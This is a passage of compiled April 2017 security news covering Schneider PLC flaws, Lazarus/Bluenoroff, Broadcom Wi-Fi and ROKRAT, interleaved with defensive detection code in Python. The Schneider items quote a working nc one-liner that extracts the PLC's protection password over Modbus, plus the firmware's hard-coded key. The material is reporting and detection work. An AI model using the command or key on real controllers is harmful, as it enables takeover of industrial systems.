The second vulnerability is related to the Application Protection feature, which prevents the transfer of an application from a PLC to a SoMachine Basic project. Researchers discovered that sending a simple command via Modbus to the controller on TCP port 502 will return the Application Protection password in clear text.

The password can be used via the SoMachine software to download applications from the controller, modify them and upload them back to the device.

The researchers said they reported their findings to Schneider Electric on December 23, but the only information they got from the vendor was the confirmation that the vulnerability report had been received.

Contacted by SecurityWeek, Schneider Electric admitted making a mistake and promised to share mitigation advice for these flaws as soon as possible on its cybersecurity support portal.

“Schneider Electric acknowledges the security note on its product Modicon TM221CE16R, Firmware 1.3.3.3, disclosed by OpenSource Security,” the company said in an emailed statement.

“Conscious about user Cyber Security concerns, Schneider Electric places a high priority on the evaluation of security research as it becomes available and produces documentation to advise users on mitigations that can be taken if they are required. Because of an issue in our standard process for interactions with cybersecurity advisory & consulting firms, we have missed the opportunity to respond to the researchers from OpenSource Security (Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg) and offer mitigation to users, and we do apologize for this. We’re reviewing and updating our processes to make sure such a situation never happens again,” the company added.

Schneider Electric recently notified customers about the availability of patches and mitigations for three vulnerabilities affecting some of its Modicon PLCs.


Lazarus Under The Hood
5.4.2017 Kaspersky CyberCrime
Download full report (PDF)

In February 2017 an article in the Polish media broke the silence on a long-running story about attacks on banks, allegedly related to the notorious Lazarus Group. While the original article didn't mention Lazarus Group, it was quickly picked up by security researchers. Today we'd like to share some of our findings, and add something new to what's currently common knowledge about Lazarus Group activities and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist. One such publication was made available by BAE Systems in May 2016; however, it only included analysis of the wiper code. This was followed by another blogpost by Anomali Labs, confirming the same wiping code similarity. This similarity was found to be satisfying by many readers; however, at Kaspersky Lab we were looking for a stronger connection.

Other claims that Lazarus was the group behind attacks on the Polish financial sector came from Symantec in 2017, which noticed string reuse in malware at one of its Polish customers. Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of its customers. However, from this it's only clear that Lazarus might have attacked Polish banks.

While all these facts are fascinating, the connection between Lazarus attacks on banks and their role in attacks on banks' systems was still loose. The only case where specific malware targeting the bank's infrastructure used to connect to the SWIFT messaging server was discovered is the Bangladesh Central Bank case. However, while almost everybody in the security industry has heard about the attack, few technical details have been revealed to the public based on the investigation that took place on site at the attacked company. Considering that the post-hack publications by the media mentioned that the investigation stumbled upon three different attackers, it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions, or if Lazarus had in fact developed its own malware to attack banks' systems.

We would like to add some strong facts that link some attacks on banks to Lazarus, and share some of our own findings as well as shed some light on the recent TTPs used by the attacker, including some yet unpublished details from the attack in Europe in 2017.

This is the first time we announce some Lazarus Group operations that have thus far gone unreported to the public. We have had the privilege of investigating these attacks and helping with incident response at a number of financial institutions in South East Asia and Europe. With cooperation and support from our research partners, we have managed to address many important questions about the mystery of Lazarus attacks, such as their infiltration method, their relation to attacks on SWIFT software and, most importantly, shed some light on attribution.


Lazarus attacks are not a local problem and clearly the group's operations span the whole world. We have seen the detection of their infiltration tools in multiple countries in the past year. Lazarus was previously known to conduct cyberespionage and cybersabotage activities, such as the attack on Sony Pictures Entertainment, with volumes of internal data leaked and many system hard drives in the company wiped. Their interest in financial gain is relatively new, considering the age of the group, and it seems that they have a different set of people working on the problems of invisible money theft or the generation of illegal profit. We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations, while a substantially smaller unit within the group, which we have dubbed Bluenoroff, is responsible for financial profit.

The watering hole attack on Polish banks was very well covered by the media; however, not everyone knows that it was one of many. Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations and hitting smaller banks because they are, apparently, easy prey.

To date, we’ve seen Bluenoroff attack four main types of targets:

Financial institutions
Casinos
Companies involved in the development of financial trade software
Crypto-currency businesses
Here is the full list of countries where we have seen Bluenoroff watering hole attacks:

Mexico
Australia
Uruguay
Russian Federation
Norway
India
Nigeria
Peru
Poland
Of course, not all attacks were as successful as the Polish case, mainly because in Poland they managed to compromise a government website. This website was frequently accessed by many financial institutions, making it a very powerful attack vector. Nevertheless, this wave of attacks resulted in multiple infections across the world, adding new hits to the map we've been building.

One of the most interesting discoveries about Lazarus/Bluenoroff came from one of our research partners who completed a forensic analysis of a C2 server in Europe used by the group. Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2. Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.


In addition, the operator installed off-the-shelf cryptocurrency mining software that was supposed to generate Monero coins. The software consumed system resources so intensely that the system became unresponsive and froze. This could be the reason why it was not properly cleaned and the server logs were preserved.

This is the first time we have seen a direct link between Bluenoroff and North Korea. Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculation. Still, seeing that IP in the C2 log does make North Korea a key part of the Lazarus/Bluenoroff equation.

Conclusions

Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011, and activities didn't disappear after Novetta published the results of its Operation Blockbuster research, in which we also participated. All those hundreds of samples that were collected give the impression that Lazarus is operating a malware factory, which produces new samples via multiple independent conveyors.

We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers. Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.

Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, the same code, and the same algorithms. “Keep morphing!” seems to be their internal motto. Those rare cases when they are caught with the same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.

This level of sophistication is something that is not generally found in the cybercriminal world. It’s something that requires strict organisation and control at all stages of operation. That’s why we think that Lazarus is not just another APT actor.

Of course such processes require a lot of money to keep running, which is why the appearance of the Bluenoroff subgroup within Lazarus was logical.

Bluenoroff, being a subgroup of Lazarus, is focusing on financial attacks only. This subgroup has reverse engineering skills because they spend time tearing apart legitimate software, and implementing patches for SWIFT Alliance software, in attempts to find ways to steal big money. Their malware is different and they aren’t exactly soldiers that hit and run. Instead, they prefer to make an execution trace to reconstruct and quickly debug the problem. They are field engineers that come when the ground is already cleared after conquering new lands.

One of Bluenoroff’s favorite strategies is to silently integrate into running processes without breaking them. From the code we’ve seen, it looks as if they are not exactly looking for a hit and run solution when it comes to money theft. Their solutions are aimed at invisible theft without leaving a trace. Of course, attempts to move around millions of USD can hardly remain unnoticed, but we believe that their malware might be secretly deployed now in many other places and it isn’t triggering any serious alarms because it’s much more quiet.

We would like to note that in all of the observed attacks against banks that we have analyzed, the SWIFT software solutions running on the banks’ servers have not demonstrated or exposed any specific vulnerability. The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, brute-forcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for their administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Therefore, in all the breaches we have analyzed, SWIFT as an organization has not been at direct fault. More than that, we have witnessed SWIFT trying to protect its customers by implementing the detection of database and software integrity issues. We believe that this is a step in the right direction and that these activities should be extended with full support. Making these integrity checks harder to patch out would be a serious obstacle to the success of future operations run by Lazarus/Bluenoroff against banks worldwide.

To date, the Lazarus/Bluenoroff group has been one of the most successful in launching large scale operations against the financial industry. We believe that they will remain one of the biggest threats to the banking sector, finance and trading companies, as well as casinos for the next few years. We would like to note that none of the financial institutions we helped with incident response and investigation reported any financial loss.

As usual, defense against attacks such as those from Lazarus/Bluenoroff should include a multi-layered approach. Kaspersky products include special mitigation strategies against this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lazarus/Bluenoroff actor and share new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility 

Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Still problems for Schneider Electric, Schneider Modicon TM221CE16R has a hardcoded password
5.4.2017 securityaffairs Security

The firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password, and there is no way to change it.
I believe it is very disconcerting to find systems inside critical infrastructure affected by easy-to-exploit vulnerabilities while we are discussing the EU NIS directive.

What about hard-coded passwords inside critical systems?

Unfortunately, it has happened again: the firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password. The bad news for users is that they cannot change the password and there is no firmware update available to fix this issue.

The firmware encrypts the XML file containing the user name and password with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

It is quite easy for an attacker to open the control environment (SoMachine Basic 1.4 SP1), decrypt the file, and take control over the device.

“The password for the project protection of the Schneider Modicon TM221CE16R is hard-coded and cannot be changed.” reads the security advisory published by Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg of Germany’s Open Source Security. “The protection of the application is not existent.”

Schneider Modicon TM221CE16R

The same team of researchers discovered another security issue affecting the Schneider TM221CE16R Firmware 1.3.3.3 hardware. The experts discovered that the password used to protect the applications can be easily retrieved by a remote unauthenticated user. The Application Protection is used to prevent the transfer of the application from a logic controller into a SoMachine Basic project.

“The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. CVSS 10.” reads a separate security advisory published by the team.

The experts discovered that a user just needs to send the following command over Modbus using TCP Port 502:

echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502
“After that the retrieved password can be entered in SoMachine Basic to download, modify and subsequently upload again any desired application”, continues the advisory.
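The bytes in the advisory's command are an ordinary Modbus/TCP frame, and that is what a defender can key on. The following Python is an added example, not part of the advisory or of any Schneider tooling: it parses the MBAP header, validates the frame, and flags the vendor-specific function code 0x5a seen above when it arrives at port 502 from a host that is not on the engineering-workstation allowlist. The sample flows, the host addresses and the allowlist are constructed for the example.

```python
import struct
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

MODBUS_TCP_PORT = 502
# Function code 0x5a (90) is the vendor-specific code carried by the request
# quoted in the advisory; it is not one of the public Modbus function codes.
VENDOR_FUNCTION_CODE = 0x5A

# The exact bytes the advisory pipes into nc: MBAP header (7 bytes) + PDU.
ADVISORY_REQUEST = b"\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00"


@dataclass
class ModbusFrame:
    transaction_id: int
    protocol_id: int
    length: int
    unit_id: int
    function_code: int
    data: bytes


def parse_modbus_tcp(payload: bytes) -> ModbusFrame:
    """Parse one Modbus/TCP ADU and enforce the MBAP invariants.

    A ValueError here is itself worth logging: conforming clients never
    send a non-zero protocol id or a length that disagrees with the frame.
    """
    if len(payload) < 8:
        raise ValueError("too short for an MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", payload[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus")
    # The MBAP length field counts unit id + function code + data.
    if length != len(payload) - 6:
        raise ValueError(f"MBAP length {length} disagrees with {len(payload) - 6} bytes present")
    return ModbusFrame(tid, pid, length, uid, payload[7], payload[8:])


def inspect_flow(src_ip: str, dst_port: int, payload: bytes,
                 engineering_hosts: FrozenSet[str]) -> Optional[str]:
    """Return an alert string, or None when the traffic is expected."""
    if dst_port != MODBUS_TCP_PORT:
        return None
    try:
        frame = parse_modbus_tcp(payload)
    except ValueError as exc:
        return f"{src_ip}: malformed Modbus/TCP frame ({exc})"
    if frame.function_code == VENDOR_FUNCTION_CODE and src_ip not in engineering_hosts:
        return (f"{src_ip}: vendor function 0x{frame.function_code:02x} to unit {frame.unit_id} "
                f"from a non-engineering host (data={frame.data.hex()})")
    return None


# Constructed sample traffic (addresses are made up): the engineering workstation,
# an unknown host sending the advisory's request, and an HMI reading holding
# registers with the public function code 0x03.
ENGINEERING_HOSTS = frozenset({"10.0.0.10"})
SAMPLE_FLOWS: List[Tuple[str, int, bytes]] = [
    ("10.0.0.10", 502, ADVISORY_REQUEST),
    ("10.0.0.99", 502, ADVISORY_REQUEST),
    ("10.0.0.20", 502, b"\x00\x07\x00\x00\x00\x06\x01\x03\x00\x00\x00\x0a"),
]


def scan_flows(flows=SAMPLE_FLOWS, engineering_hosts=ENGINEERING_HOSTS) -> List[str]:
    alerts = []
    for src_ip, dst_port, payload in flows:
        alert = inspect_flow(src_ip, dst_port, payload, engineering_hosts)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in scan_flows():
        print(line)
```

Only the unknown host's request produces an alert; the same request from the engineering workstation is the traffic SoMachine Basic legitimately generates, and the HMI's register read uses a public function code and is ignored. Since the password cannot be changed on this firmware, restricting which hosts may reach port 502 and alerting on this function code from anywhere else is the compensating control that remains.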


Download and install the last iOS 10.3.1, attackers can hack you over Wi-Fi
5.4.2017 securityaffairs Apple

A critical flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip”; download and install the latest iOS 10.3.1 release.
Last week, Apple released iOS 10.3, an important release of the popular operating system that fixed more than 100 bugs and implemented security improvements.

Apple has now pushed an emergency patch update (iOS 10.3.1) that fixes some critical vulnerabilities, including one tracked as CVE-2017-6975. The flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip.”
The flaw was first discovered by the expert Gal Beniamini of Google’s Project Zero team; the expert and his team did not disclose technical details of the flaw.

“Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip

Description: A stack buffer overflow was addressed through improved input validation.

CVE-2017-6975: Gal Beniamini of Google Project Zero” reads the security note published by Apple for the iOS 10.3.1 release.

CVE-2017-6975 affects iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later.
The iPhone 5S was not affected because it is the first model based on a 64-bit processor.

Today Beniamini will publish a detailed technical analysis of the issue, including a detailed description of the attack scenario. The iOS 10.3.1 update can be downloaded via Settings → General → Software Update on your iOS device.
Apple users already running iOS 10.3 can download and install the iOS 10.3.1 release simply by pressing the “Download and Install” button.

If you are the owner of an Apple iPhone, iPad and iPod Touch you must update your device as soon as possible.


Millions Of Smartphones Using Broadcom Wi-Fi Chip Can Be Hacked Over-the-Air
5.4.2017 thehackernews Mobil


Millions of smartphones and smart gadgets, including Apple iOS and many Android handsets from various manufacturers, equipped with Broadcom Wifi chips are vulnerable to over-the-air hijacking without any user interaction.
Just yesterday, Apple rushed out an emergency iOS 10.3.1 patch update to address a serious bug that could allow an attacker on the same Wi-Fi network to remotely execute malicious code on the Broadcom Wi-Fi SoC (system-on-chip) used in iPhones, iPads, and iPods.
The vulnerability was described as a stack buffer overflow issue and was discovered by Google's Project Zero staffer Gal Beniamini, who today detailed his research in a lengthy blog post, saying the flaw affects not only Apple but all devices using Broadcom's Wi-Fi stack.
Beniamini says this stack buffer overflow issue in the Broadcom firmware code could lead to remote code execution vulnerability, allowing an attacker in the smartphone's WiFi range to send and execute code on the device.
Attackers with high skills can also deploy malicious code to take full control over the victim's device and install malicious apps, like banking Trojans, ransomware, and adware, without the victim's knowledge.
In his next blog post that's already on its way, Beniamini will explain how attackers can use their assumed control of the Wi-Fi SoC in order to further escalate their privileges into the application processor, taking over the host’s operating system.
Over-the-Air Broadcom Wi-Fi SoC Hack

According to the researcher, the firmware running on Broadcom WiFi SoC can be tricked into overrunning its stack buffers, which allowed him to send carefully crafted WiFi frames, with abnormal values, to the Wi-Fi controller in order to overflow the firmware's stack.
Beniamini then combined this with the chipset's frequent timer firings to gradually overwrite specific chunks of the device's memory (RAM) until his code was executed.
So, to exploit the flaw, an attacker only needs to be within Wi-Fi range of the affected device to silently take it over.
"While the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," Beniamini explains. "Specifically, it lacks all basic exploit mitigations – including stack cookies, safe unlinking and access permission protection."
The researcher also detailed a proof-of-concept Wi-Fi remote code execution exploit in the blog post and successfully performed it on a then-fully updated (now fixed) Nexus 6P, running Android 7.1.1 version NUF26K – the latest available Nexus device at the time of testing in February.
The flaw is one of the several vulnerabilities discovered by Beniamini in the firmware version 6.37.34.40 of Broadcom Wi-Fi chips.
Security Patch for Nexus & iOS Released; Others Have to Wait!
Google Project Zero team reported the issue to Broadcom in December. Since the flaw is in Broadcom's code, smartphone makers had to wait for a patch from the chip vendor before testing the patch and pushing it out to their own user base.
Both Apple and Google addressed the vulnerability with security updates released on Monday, with Google delivering updates via its Android April 2017 Security Bulletin and Apple releasing the iOS 10.3.1 update.
The flaw still affects most Samsung flagship devices, including Galaxy S7 (G930F, G930V), Galaxy S7 Edge (G935F, G9350), Galaxy S6 Edge (G925V), Galaxy S5 (G900F), and Galaxy Note 4 (N910F), the researcher says.
For more technical details head on to the blog post published by Google Project Zero team today.


Wi-Fi Flaws Expose iPhone, Nexus Phones to Attacks

5.4.2017 securityweek  Vulnerebility

Vulnerabilities in Broadcom’s Wi-Fi system-on-chip (SoC) can be exploited to hijack iPhone, Nexus, Samsung and other smartphones without requiring any user interaction.

Google Project Zero researcher Gal Beniamini has identified several remote code execution, privilege escalation and information disclosure vulnerabilities in Broadcom firmware.

Since Broadcom’s Wi-Fi chips are widely used, the flaws affect many devices, including Google’s Nexus 5, 6 and 6P, all iPhones since iPhone 4, and most of Samsung’s flagship Android smartphones.

Beniamini has published a lengthy blog post describing the Broadcom Wi-Fi chipset and vulnerabilities that can be exploited for remote code execution. The researcher has also promised to publish another blog post that will provide details on the second part of the exploit chain, which involves elevating privileges from the SoC to the operating system’s kernel.

An attacker who is in Wi-Fi range can exploit the security holes found by the Google researcher to take complete control of a vulnerable device without any user interaction.

Beniamini applauded Broadcom’s response, stating that the company was responsive and helpful in fixing the vulnerabilities and making the patches available to affected device manufacturers.

The researcher said Broadcom’s firmware lacks all basic exploit mitigations, but the company claims newer versions do include some security mechanisms and exploit mitigations are being considered for future versions.

Apple released an emergency update this week for iOS to address the remote code execution vulnerability (CVE-2017-6975), but the company did not provide any details.

The Broadcom flaws were also patched in Android with the release of the April security updates.

Samsung has also released maintenance updates this week for its Android devices. The updates include both the Google patches and fixes for vulnerabilities specific to Samsung products.


South Korean users targeted with a new stealthy malware, the ROKRAT RAT
5.4.2017 securityaffairs Virus

Security experts at CISCO Talos have spotted a new insidious remote access tool dubbed ROKRAT that implements sophisticated anti-detection measures.
The ROKRAT RAT targets Korean users, people using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.

ROKRAT RAT

The ROKRAT RAT was used in a phishing campaign detected several weeks ago; the attackers used weaponized documents as attachments.

“This actor is quick to cover their tracks and very quickly cleaned up their compromised hosts. We believe the compromised infrastructure was live for a mere matter of hours during any campaign,” reads the analysis published by Cisco Talos researchers Warren Mercer, Paul Rascagneres and Matthew Molyett.

The experts suspect the involvement of a sophisticated threat actor that aimed to compromise the systems of South Korean users in the public sector.

The attackers sent phishing messages from an email address tied to South Korea’s Yonsei University on the topic of an upcoming and fictitious “Korean Reunification and North Korean Conference”.

The attackers compromised a legitimate email address of a big forum powered by a university in Seoul to send out spear phishing email.

The attackers attempted to trick victims into opening the attachments by asking them to provide feedback to the conference organizers. The phishing emails contain two HWP documents that embed an Encapsulated PostScript (EPS) object.

“The purpose of the EPS is to exploit a well-known vulnerability (CVE-2013-0808) to download a binary disguised as a .jpg file. This file is decoded and finally an executable is launched: ROKRAT,” said researchers.

The EPS flaw, tracked as CVE-2013-0808, was discovered in 2013. It is a buffer overflow in the EPS viewer that could be exploited by attackers to execute arbitrary code on targeted machines.

“An HWP document is composed by OLE objects. In our case, it contains an EPS object named BIN0001.eps. As with all HWP documents the information is zlib compressed so you must decompress the .eps to get the true shellcode.” continues the analysis.

The shellcode is used to trigger the CVE-2013-0808 vulnerability and download the ROKRAT RAT binary from the command and control server. The binary is dropped as a .jpg file named “worker.jpg” or “kingstone.jpg”.
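Talos describes the extraction step in a single sentence: decompress the EPS object stream, then look at it. The following Python is an added example, not code from Talos or from the HWP project: it inflates an object stream, trying raw deflate first and the zlib-wrapped form second (which variant HWP writes is an assumption of this example), and reports whether the result is an EPS file and how much of it is text. The EPS bodies, the object names' pairing with content, and the text-ratio threshold are constructed for the example.

```python
import zlib
from typing import Dict

EPS_MAGIC = b"%!PS-Adobe"
# Below this share of printable bytes an EPS object gets a closer look; the
# threshold is an assumption of this example, not a documented indicator.
TEXT_RATIO_THRESHOLD = 0.8


def inflate_hwp_stream(blob: bytes) -> bytes:
    """Inflate one compressed HWP object stream.

    Raw deflate (no zlib header, wbits=-15) is tried first and the zlib-wrapped
    form second; which variant HWP writes is an assumption here, and trying both
    costs nothing because the wrong one fails zlib's own format checks.
    """
    for wbits in (-15, 15):
        d = zlib.decompressobj(wbits)
        try:
            out = d.decompress(blob) + d.flush()
        except zlib.error:
            continue
        if d.eof:
            return out
    raise ValueError("blob is not a complete deflate or zlib stream")


def text_ratio(data: bytes) -> float:
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) if data else 0.0


def triage_object(name: str, blob: bytes) -> dict:
    """Inflate one embedded object and report what it actually contains."""
    data = inflate_hwp_stream(blob)
    is_eps = data.lstrip().startswith(EPS_MAGIC)
    ratio = round(text_ratio(data), 2)
    return {
        "name": name,
        "inflated_size": len(data),
        "is_eps": is_eps,
        "text_ratio": ratio,
        # EPS is a text format; an EPS object that is mostly non-text is the
        # heuristic this example uses to queue the object for manual analysis.
        "suspicious": is_eps and ratio < TEXT_RATIO_THRESHOLD,
    }


def _deflate(raw: bytes, wbits: int) -> bytes:
    c = zlib.compressobj(wbits=wbits)
    return c.compress(raw) + c.flush()


# Constructed sample objects. BIN0001.eps carries a valid EPS header followed by a
# large opaque blob (a stand-in for a non-text payload); BIN0002.eps is a plain drawing.
OPAQUE_BLOB = bytes(range(256)) * 8
BENIGN_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n"
              b"newpath 0 0 moveto 100 100 lineto stroke\nshowpage\n")
LOADED_EPS = b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\n" + OPAQUE_BLOB
SAMPLE_OBJECTS: Dict[str, bytes] = {
    "BIN0001.eps": _deflate(LOADED_EPS, -15),   # raw deflate, as HWP is assumed to store it
    "BIN0002.eps": _deflate(BENIGN_EPS, 15),    # zlib-wrapped, to exercise the fallback
}


def triage_hwp_objects(objects=SAMPLE_OBJECTS) -> Dict[str, dict]:
    return {name: triage_object(name, blob) for name, blob in objects.items()}


if __name__ == "__main__":
    for report in triage_hwp_objects().values():
        print(report)
```

In practice the object streams come out of the HWP file's OLE container (the article names the stream BIN0001.eps); this example starts from the already-extracted blob so that it runs without an OLE parser. The text-ratio heuristic only ranks objects for a human to look at; it does not claim to recognise the CVE-2013-0808 trigger.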

If the malware detects a sandbox environment it will block its activity and try to deceive security researchers by generating fake traffic.

The malware appears to connect and load either an Amazon video of a game called “Men of War” or a Hulu anime video called “Golden Time”.

The security experts warned of similar attacks against other high-value targets; it is possible that threat actors could also use the EPS vulnerability to target Microsoft Word users.

The experts also observed an evolution of the ROKRAT RAT: it is using new communication channels, such as Twitter and the Yandex and Mediafire cloud platforms.

In this way, the attacker makes detection of the malicious traffic harder and also benefits from the HTTPS connectivity these services implement.

“This investigation shows us once again that South Korean interests sophisticated threat actors.” concludes the analysis.

“This campaign shows us a motivated malware actor. The usage of HWP (an application mainly used in Korea) and the fact that emails and documents are perfectly written in Korean suggests that the author is a native Korean speaker.”


Ransomware in targeted attacks
5.4.2017 Kaspersky Virus

Ransomware’s popularity has attracted the attention of cybercriminal gangs; they use these malicious programs in targeted attacks on large organizations in order to steal money. In late 2016, we detected an increase in the number of attacks, the main goal of which was to launch an encryptor on an organization’s network nodes and servers. This is due to the fact that organizing such attacks is simple, while their profitability is high:

The cost of developing a ransom program is significantly lower compared to other types of malicious software.
These programs entail a clear monetization model.
There is a wide range of potential victims.
Today, an attacker (or a group) can easily create their own encryptor without making any special effort. A vivid example is the Mamba encryptor, based on the open source software DiskCryptor. Some cybercriminal groups do not even take the trouble of involving programmers; instead, they use this legal utility “out of the box.”

DiskCryptor utility

The model of attack looks like this:

Search for an organization that has an unprotected server with RDP access.
Guess the password (or buy access on the black market).
Encrypt a node or server manually.

Notification about encrypting the organization’s server

The cost to organize such an attack is minimal, while the profit could reach thousands of dollars. Some partners of well-known encryptors resort to the same scheme. The only difference is the fact that, in order to encrypt the files, they use a version of a ransom program purchased from the group’s developer.
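The three-step model above starts with an exposed RDP server and a guessed password, which leaves a very visible trace in the Windows Security log. The following Python is an added example, not from the Kaspersky report: it parses a constructed export of logon events (4625 failures, 4624 successes, logon type 10 for RDP) and raises an alert when one source address accumulates five failures inside two minutes, and a second, higher-priority alert when that same address then logs on successfully. The log records, addresses, accounts and thresholds are all constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Set

# Constructed flattening of Windows Security log records to
# "timestamp,event_id,logon_type,source_ip,account". 4625 is a failed logon,
# 4624 a successful one; logon type 10 is RemoteInteractive, i.e. RDP.
SAMPLE_LOG = """\
2017-04-05T03:00:00,4625,10,10.0.0.5,administrator
2017-04-05T03:00:05,4625,10,10.0.0.5,administrator
2017-04-05T03:00:10,4625,10,10.0.0.5,admin
2017-04-05T03:00:15,4625,10,10.0.0.5,backup
2017-04-05T03:00:20,4625,10,10.0.0.5,administrator
2017-04-05T03:00:25,4625,10,10.0.0.5,administrator
2017-04-05T03:00:40,4624,10,10.0.0.5,administrator
2017-04-05T03:01:40,4625,10,192.168.1.20,jsmith
2017-04-05T03:01:50,4624,10,192.168.1.20,jsmith
2017-04-05T03:02:00,4625,3,10.0.0.5,svc_sql
"""

FAILED_LOGON = 4625
SUCCESSFUL_LOGON = 4624
RDP_LOGON_TYPE = 10


def parse_log(text: str) -> List[dict]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, ip, account = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(event_id),
                       "logon_type": int(logon_type), "ip": ip, "account": account})
    return events


def detect_rdp_bruteforce(events: List[dict], threshold: int = 5,
                          window: timedelta = timedelta(minutes=2)) -> List[dict]:
    """Sliding-window count of RDP logon failures per source address.

    One alert is raised when a source reaches `threshold` failures inside
    `window`; a second, more urgent one when the same source then succeeds,
    which is the "guessed the password" step of the attack model above.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    accounts: Dict[str, Set[str]] = defaultdict(set)
    flagged: Set[str] = set()
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != RDP_LOGON_TYPE:
            continue  # network/service logons are a different detection
        ip = ev["ip"]
        if ev["event_id"] == FAILED_LOGON:
            q = recent[ip]
            q.append(ev["time"])
            accounts[ip].add(ev["account"])
            while q and ev["time"] - q[0] > window:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"ip": ip, "kind": "rdp-bruteforce", "time": ev["time"],
                               "failures": len(q)})
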